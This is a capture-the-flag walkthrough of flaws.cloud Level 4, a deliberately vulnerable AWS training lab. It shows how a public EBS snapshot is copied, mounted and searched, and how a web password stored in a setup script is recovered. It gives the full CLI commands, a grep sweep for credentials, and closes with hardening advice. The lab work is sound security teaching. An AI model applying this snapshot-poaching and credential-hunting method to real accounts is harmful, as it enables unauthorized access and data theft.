Poorly Secured EBS Backups: Flaws.cloud Level 4
Level 4 is located at http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud, and from there the author points us to another page at https://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/, which we can't access because the server is password protected.
The author provides a few hints as to where to start: the site is hosted on an EC2 instance, and just before launch it was backed up with Elastic Block Store, i.e. EBS. Before we even start trying to crack this bad boy, we need to understand EC2 and EBS.
EC2 or Elastic Compute Cloud is AWS lingo for "rentable virtual servers". These are considered "elastic" because they can be configured with what are called autoscaling policies to increase or decrease the number of running servers in response to fluctuations in network traffic, computational load, or storage demands. Typically, files on a computer are stored on disks, which the operating system exposes as block devices. In traditional computing terms the slices of a disk are referred to as partitions, whereas AWS refers to its virtual disks as "volumes". If you plan on starting your own cloud company, please don't re-invent the wheel and create new terminology for literally everything!
EBS is Elastic Block Store. A central marketing point of AWS is scalability, so block storage is elastic too. With EBS, DevOps engineers can create "snapshots" of "volumes"; that is, they can make what used to be called backups of what used to be called disk partitions. Creating EBS snapshots is good for disaster recovery, but snapshots can also be used to share data across different hosts as EC2 autoscales.
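To make that concrete, this is roughly what taking a snapshot looks like from the CLI. The volume ID here is a made-up placeholder, not anything from this level:
# snapshot an existing volume (hypothetical volume ID)
aws ec2 create-snapshot --volume-id vol-0123456789abcdef0 --description "web server backup"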
S3 is a storage platform too, but it is not block storage; it's flat object storage that merely gives the illusion of a hierarchical file system. S3 is typically used for media distribution, CSS, JS, and log files, while EBS is more typically used for raw file systems that can be moved to and from instances. Although S3 could technically store an entire filesystem, I don't think anyone would want to go through the hassle of mounting a filesystem from S3 on an EC2 instance.
Now back to the fun part. We'll need to see the snapshots that the AWS profile we obtained in the last level has access to, and for that we'll need the account ID, which we can obtain with an sts get-caller-identity call:
$ aws --profile flaws sts get-caller-identity
{
    "UserId": "AIDAJQ3H5DC3LEG2BKSLC",
    "Account": "975426262029",
    "Arn": "arn:aws:iam::975426262029:user/backup"
}
So long as we have permission to do so (the ec2:DescribeSnapshots action), we can also use the ec2 API to retrieve a list of snapshots belonging to the account:
$ aws --profile flaws ec2 describe-snapshots --owner-id 975426262029
{
    "Snapshots": [
        {
            "Description": "",
            "Encrypted": false,
            "OwnerId": "975426262029",
            "Progress": "100%",
            "SnapshotId": "snap-0b49342abd1bdcb89",
            "StartTime": "2017-02-28T01:35:12.000Z",
            "State": "completed",
            "VolumeId": "vol-04f1c039bc13ea950",
            "VolumeSize": 8,
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "flaws backup 2017.02.27"
                }
            ],
            "StorageTier": "standard"
        }
    ]
}
The relevant information here is the SnapshotId and the VolumeId; the VolumeId is, obviously, the volume from which this snapshot was taken. In hint number 2 the author tells us that the snapshot was made public and that it's located in the us-west-2 region. For the life of me I don't know why anyone would ever need to make an EBS snapshot public, and I continue to wonder why this is even a feature.
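If you're curious what "public" actually looks like on the AWS side, a snapshot's sharing settings live in its createVolumePermission attribute, which you can inspect like this (an optional check, assuming the backup user is allowed to make the call; a public snapshot should list the all group in CreateVolumePermissions):
# inspect who is allowed to create volumes from the snapshot
aws --profile flaws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --region us-west-2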
You'll need to do these next few steps from your own AWS account; be sure to delete everything afterwards so you don't incur charges. We'll start by making a copy of the snapshot in our own AWS account; next, we'll create a volume from the snapshot, spin up an EC2 instance, find the block device corresponding to the volume, mount it, and take a peek around.
Let's make a copy (into us-west-2, the same region where we'll create the volume):
aws ec2 copy-snapshot --source-region us-west-2 --source-snapshot-id snap-0b49342abd1bdcb89 --region us-west-2
{
    "SnapshotId": "snap-09b8be60b4991f255"
}
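Copying is asynchronous, so if the next step complains that the snapshot isn't ready yet, you can block until the copy finishes (optional; the snapshot ID is the one returned by the copy):
# wait until the copied snapshot reaches the "completed" state
aws ec2 wait snapshot-completed --snapshot-ids snap-09b8be60b4991f255 --region us-west-2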
Time to make a volume:
aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-09b8be60b4991f255
{
    "AvailabilityZone": "us-west-2a",
    "CreateTime": "2023-06-05T17:51:48.000Z",
    "Encrypted": false,
    "Size": 8,
    "SnapshotId": "snap-09b8be60b4991f255",
    "State": "creating",
    "VolumeId": "vol-0f6c414663df939f1",
    "Iops": 100,
    "Tags": [],
    "VolumeType": "gp2",
    "MultiAttachEnabled": false
}
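The volume comes back in the creating state and has to reach available before it can be attached. You can watch it in the console or lean on the CLI waiter (optional):
# block until the new volume is ready to be attached
aws ec2 wait volume-available --volume-ids vol-0f6c414663df939f1 --region us-west-2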
We'll create an instance from the console; a plain old t2.micro running Ubuntu will do, as long as it's launched in the same availability zone as the volume (us-west-2a), since EBS volumes can only be attached to instances in their own AZ. Take note of the instance's ID for when it's time to attach the volume:
aws ec2 attach-volume --device xvdb --instance-id i-0af2cf604c7a09e0e --volume-id vol-0f6c414663df939f1 --region us-west-2
{
    "AttachTime": "2023-06-05T18:13:53.967Z",
    "Device": "xvdb",
    "InstanceId": "i-0af2cf604c7a09e0e",
    "State": "attaching",
    "VolumeId": "vol-0f6c414663df939f1"
}
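The attachment starts out in the attaching state; if you'd like to confirm from the CLI that it has finished before connecting to the instance, the volume-in-use waiter covers it (optional):
# wait for the volume to finish attaching to the instance
aws ec2 wait volume-in-use --volume-ids vol-0f6c414663df939f1 --region us-west-2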
Devices are Linux files that represent hardware; in this case, attaching the volume creates a block device called xvdb. Head on over to the instance in the AWS console and click connect. You can validate that you've got the xvdb device by running ls /dev | grep xvdb, or you can see all of the block devices on the system by running lsblk:
$ lsblk
NAME     MAJ:MIN RM   SIZE RO TYPE MOUNTPOINTS
loop0      7:0    0  24.4M  1 loop /snap/amazon-ssm-agent/6312
loop1      7:1    0  55.6M  1 loop /snap/core18/2745
loop2      7:2    0  63.3M  1 loop /snap/core20/1879
loop3      7:3    0 111.9M  1 loop /snap/lxd/24322
loop4      7:4    0  53.2M  1 loop /snap/snapd/19122
xvda     202:0    0     8G  0 disk
├─xvda1  202:1    0   7.9G  0 part /
├─xvda14 202:14   0     4M  0 part
└─xvda15 202:15   0   106M  0 part /boot/efi
xvdb     202:16   0     8G  0 disk
└─xvdb1  202:17   0     8G  0 part
This is a list of the block devices on the system: xvda and its partitions make up the primary (root) volume, and xvdb is the secondary volume we just attached. Its partition xvdb1 contains the file system of the volume we just poached, and we want to take a look around inside of it.
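If you want to confirm what's actually on that partition before mounting it, the file utility can probe the block device directly (an optional sanity check; it should report an ext4 filesystem here):
# identify the filesystem on the poached partition
$ sudo file -s /dev/xvdb1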
Mounting is the process of attaching the file system on a block device to the directory tree, and it is unironically achieved with the mount command, which needs to be run with sudo privileges. We'll start by creating a mount point, which is nothing more than a directory where the root of the new file system will be attached:
# create a mount point
$ mkdir poached
# attach the block device to the mount point
$ sudo mount /dev/xvdb1 poached
# enter the filesystem
$ cd poached
# as you can see, it's a typical ext4 filesystem
~/poached$ ls
bin dev home initrd.img.old lib64 media opt root sbin
srv tmp var vmlinuz.old boot etc initrd.img lib
lost+found mnt proc run snap sys usr vmlinuz
As you can see, we have a whole Linux file system within the poached volume. It's been a while, but remember, we're looking for clues to bypass the password authentication on the web server. First, we'll check the home directory:
~/poached$ ls home/ubuntu
meta-data setupNginx.sh
How convenient, a configuration shell script for the Nginx web server; let's see what that's about:
~/poached$ cat /home/ubuntu/setupNginx.sh
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
/etc is the directory that stores the configuration files for all the services on the system. In this case the htpasswd utility is writing basic-auth credentials into /etc/nginx/.htpasswd, the file Nginx checks before letting anyone in: the username is flaws and the password is nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M. If you log in with that username and password you'll see that you've pwnd the system!
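Browsing around happened to work here, but on a larger snapshot it's worth sweeping the mounted filesystem for credentials programmatically. A rough sketch; the patterns and paths are just examples, not something the author prescribes:
# from the directory containing the mount point, hunt for common credential patterns
$ sudo grep -rniE "password|htpasswd|secret|aws_access_key" poached/home poached/etc poached/root 2>/dev/null | head -50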
This level is meant to teach us a few lessons, the most obvious being not to make EBS snapshots public. According to the author, people sometimes make things public in case they lose access to their account; if you do choose to go this route, which I don't personally recommend, you can add a layer of security by encrypting the volume. AWS offers various encryption options in which the keys are managed either by you or by the cloud provider.
Configuration scripts storing sensitive information need to be locked down: the author could have transferred ownership of the script to root, stripped the `rwx` permissions for all other users, and scheduled the script to run at boot with a cron job or similar.
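A minimal sketch of that hardening, assuming the script lives at /home/ubuntu/setupNginx.sh as it does on the snapshot (the cron.d entry is one option among several):
# root owns the script and nobody else can read, write, or execute it
$ sudo chown root:root /home/ubuntu/setupNginx.sh
$ sudo chmod 700 /home/ubuntu/setupNginx.sh
# run it once at boot from a root cron entry
$ echo "@reboot root /home/ubuntu/setupNginx.sh" | sudo tee /etc/cron.d/setup-nginx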
Lastly, leaving configuration scripts on the instance is unnecessary for EC2, because launch configurations and launch templates offer the option of running scripts, installing software, and even managing compliance every time autoscaling spawns a new instance.
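A sketch of what that could look like; the template name, AMI ID, and setup.sh file are hypothetical, and the point is simply that the provisioning script rides along in the launch template's user data (ideally pulling the password from a secrets store) rather than sitting on disk:
# setup.sh would hold the Nginx provisioning; user data must be base64-encoded
aws ec2 create-launch-template --launch-template-name nginx-web --launch-template-data "{\"ImageId\":\"ami-0123456789abcdef0\",\"InstanceType\":\"t2.micro\",\"UserData\":\"$(base64 -w0 setup.sh)\"}"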
AWS gives you a lot of free stuff to play around with, but eventually they've got to make a buck and start charging you for the services you're using. To avoid running up an unwanted bill, be sure to terminate the instance and destroy the attached volume and its associated snapshot. I find the easiest way to do this is through the web console, but a rough CLI version is sketched below. Thanks for reading, I'll see you over at Level 5!!
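For completeness, the same teardown from the CLI using the IDs from this walkthrough (run from your own account, and unmount the volume on the instance first with sudo umount ~/poached):
# tear everything down so it stops billing
aws ec2 detach-volume --volume-id vol-0f6c414663df939f1 --region us-west-2
aws ec2 wait volume-available --volume-ids vol-0f6c414663df939f1 --region us-west-2
aws ec2 delete-volume --volume-id vol-0f6c414663df939f1 --region us-west-2
aws ec2 delete-snapshot --snapshot-id snap-09b8be60b4991f255 --region us-west-2
aws ec2 terminate-instances --instance-ids i-0af2cf604c7a09e0e --region us-west-2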